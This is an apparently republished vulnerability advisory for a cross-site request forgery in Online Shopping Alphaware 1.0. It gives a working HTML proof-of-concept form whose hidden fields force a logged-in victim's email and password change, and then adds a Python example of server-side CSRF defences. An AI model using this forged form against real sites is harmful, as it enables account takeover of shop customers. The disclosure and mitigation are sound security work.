Online Shopping Alphaware 1.0 Cross Site Request Forgery

Online Shopping Alphaware version 1.0 suffers from a cross site request forgery vulnerability.

MD5 | 0e473b277cc5006c19c5c1b0cd4d436f

# Exploit Title: Online Shopping Alphaware 1.0  - Cross-Site Request Forgery (Account Takeover)
# Date: 2020-8-4
# Exploit Author: Edo Maland
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows & Linux Server

# Vulnerability Details
# Description : Account Takeover and Edit Customer Profile


The email and password parameters can be forged to force the password change of another user account.


<script>history.pushState('', '', '/')</script>
<form action="" method="POST">
<input type="hidden" name="firstname" value="info" />
<input type="hidden" name="mi" value="x" />
<input type="hidden" name="lastname" value="csrf" />
<input type="hidden" name="address" value="Yogyakarta" />
<input type="hidden" name="country" value="Indonesia" />
<input type="hidden" name="zipcode" value="1337" />
<input type="hidden" name="mobile" value="1337" />
<input type="hidden" name="telephone" value="1337" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="changepasswordhere" />
<input type="hidden" name="edit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
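
A server-side check that rejects the forged request above, as an added example (not code from the advisory or from the application). It is framework-neutral Python; the shop origin, the session id, the credential check and the `csrf_token` and `current_password` field names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)     # per-deployment secret (constructed)
TRUSTED_ORIGIN = "https://shop.example"  # hypothetical origin of the shop

def issue_csrf_token(session_id):
    """Token the server embeds in its own edit-profile form for this session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers):
    """True only if Origin (or, failing that, Referer) names the shop itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN

def check_profile_edit(session_id, headers, form, verify_password):
    """Return (allowed, reason) for a POST carrying edit=Save Changes."""
    if not same_origin(headers):
        return False, "cross-origin request"
    sent = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, issue_csrf_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    # email/password changes decide who owns the account: re-authenticate.
    if not verify_password(session_id, form.get("current_password", "")):
        return False, "current password required"
    return True, "ok"

# Constructed sample data: the fields the forged form above submits.
FORGED_FORM = {"firstname": "info", "lastname": "csrf",
               "email": "other@example.invalid",
               "password": "changepasswordhere", "edit": "Save Changes"}

def demo():
    sid, site = "session-1234", {"Origin": TRUSTED_ORIGIN}  # constructed
    verify = lambda s, pw: pw == "old-password"     # stand-in credential check
    cross = check_profile_edit(sid, {"Origin": "https://other.example"},
                               FORGED_FORM, verify)
    no_token = check_profile_edit(sid, site, FORGED_FORM, verify)
    genuine = dict(FORGED_FORM, csrf_token=issue_csrf_token(sid),
                   current_password="old-password")
    return cross, no_token, check_profile_edit(sid, site, genuine, verify)

if __name__ == "__main__":
    print(demo())
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer on top of these checks.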

